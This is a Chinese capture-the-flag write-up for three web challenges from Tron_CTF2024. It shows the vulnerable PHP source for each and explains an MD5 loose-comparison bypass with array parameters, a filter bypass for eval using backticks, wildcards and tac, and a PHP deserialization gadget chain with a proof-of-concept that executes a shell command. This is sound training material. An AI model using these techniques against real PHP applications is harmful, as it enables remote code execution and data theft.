Tron_CTF2024新生赛 WEB
web业余憨憨简单复现一下,不过有两题环境挂了
s1mple_php
题目
easy
我的解答:
源码:
<?php
highlight_file(__FILE__);
include("flag.php");
$c = $_POST['c'];
$v = $_GET['v'];
$e = $_GET['e'];
if(isset($_GET['v']) and isset($_GET['e'])){
if ($_GET['v'] != $_GET['e']){
if ((md5($_GET['v']) == md5($_GET['e']))){
if(isset($_POST['c'])){
echo $flag;
}else{
die('no!!!');
}
}else{
die('wrong!');
}
}else{
die('wrong wrong !!');
}
}else{
die('wrong wrong wrong!!!');
}
?>
wrong wrong wrong!!!
简单的md5弱比较绕过,保证v和e值不同但md5值相同。可以用数组绕过:v[]=123&e[]=456
c就随便了。传个值就行。
秒了
题目
你会RCE吗?
我的解答:
源码:
<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
$c = $_POST['c'];
$c = str_replace("("," ",$c);
$c = str_replace("."," ",$c);
$c = str_replace("cat"," ",$c);
eval($c);
?>
分析可知它屏蔽了"(" "."和"cat",我们可以使用反引号 ` 通配符 * 以及 tac绕过。
fxlh
题目
你会造链子吗?
我的解答:
源码:
<?php
highlight_file(__FILE__);
class zzz
{
public $z;
function __construct($z)
{
$this->z = $z;
}
function __destruct()
{
$this->z->pdf();
}
}
class hhh
{
public $h;
function __call($onename,$val)
{
echo $this->h->docx;
}
}
class ccc
{
public $c;
function __construct($c)
{
$this->c = $c;
}
function __get($Attribute)
{
eval($this->c);
}
}
$p = $_GET['p'];
if(isset($p) and !preg_match('/system/i',$p)) {
unserialize($_GET['p']);
}else{
die('no system!!!');
}
?>
no system!!!
首先找到链尾,去找满足出触发_get方法的条件,这里在hhh类里利用h变量可以触发
再去找触发_call方法的条件,这里在zzz类里利用_destruct()方法可以触发
构造POC如下:
<?php
class zzz
{
public $z;
function __destruct()
{
$this->z->pdf();
}
}
class hhh
{
public $h;
}
class ccc
{
public $c = "echo `cat flag.php`;";
}
$en = new zzz();
$s = new hhh();
$e = new ccc();
$en -> z = $s;
$s -> h = $e;
echo serialize($en);
?>